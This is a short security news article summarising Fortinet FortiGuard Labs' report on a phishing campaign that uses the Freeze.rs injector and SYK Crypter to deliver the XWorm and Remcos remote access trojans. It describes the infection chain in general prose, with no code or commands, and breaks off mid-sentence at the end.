![New Attack Alert Freeze[.]rs Injector Weaponized for XWorm Malware Attacks](https://mypageo.com/wp-content/uploads/2023/08/okup.jpg)
New Attack Alert Freeze[.]rs Injector Weaponized for XWorm Malware Attacks
New Attack Alert: Emerging Threat – Freeze[.]rs Injector Weaponized for XWorm Malware Attacks
A new attack methodology has come to light, as malicious entities employ a legitimate Rust-based injector named Freeze[.]rs to distribute the XWorm commodity malware. Fortinet FortiGuard Labs discovered this novel approach on July 13, 2023. The assault originates with a deceptive PDF file dispatched via a phishing email, initiating a chain reaction.
The attack sequence utilizes SYK Crypter, a tool previously associated with various malware strains, to introduce Remcos RAT. Security analyst Cara Lin explained that the PDF file redirects to an HTML file utilizing the ‘search-ms’ protocol, eventually accessing an LNK file on a remote server. A PowerShell script is then executed by clicking the LNK file, initiating Freeze[.]rs and SYK Crypter for subsequent actions, report said
Freeze[.]rs, unveiled by Optiv on May 4, 2023, serves as an open-source red teaming tool. It excels in creating payloads that bypass security solutions and execute shellcode discreetly. This tool removes Userland EDR hooks and artfully executes shellcode, outmaneuvering endpoint monitoring controls.
![New Attack Alert: Freeze[.]rs Injector Weaponized for XWorm Malware Attacks](https://mypageo.com/wp-content/uploads/2023/08/attack-1.jpg)
Contrastingly, SYK Crypter is a versatile distribution tool for a range of malware families, including AsyncRAT, NanoCore RAT, and QuasarRAT. This crypter is retrieved from the Discord content delivery network, camouflaging itself within seemingly benign emails.
This multifaceted attack employs multiple layers of obfuscation, leveraging the “search-ms” URI protocol handler. By imitating local searches, malicious files are disguised as legitimate attachments.
Ultimately, the injected shellcode decrypts and deploys the XWorm remote access trojan, gathering sensitive data and granting remote control over the compromised system.
Targeting Europe and North America”
The alarming speed at which Freeze[.]rs was adopted for offensive purposes underscores the adaptability of malicious actors. The PowerShell script, apart from loading the injector, activates another executable, serving as a dropper fetching the SYK Crypter with encrypted Remcos RAT.
Security researcher Cara Lin noted that the amalgamation of XWorm and Remcos RAT creates a formidable trojan with diverse malicious capabilities. Reports from the C2 server traffic reveal that Europe and North America are the primary targets of this campaign, for more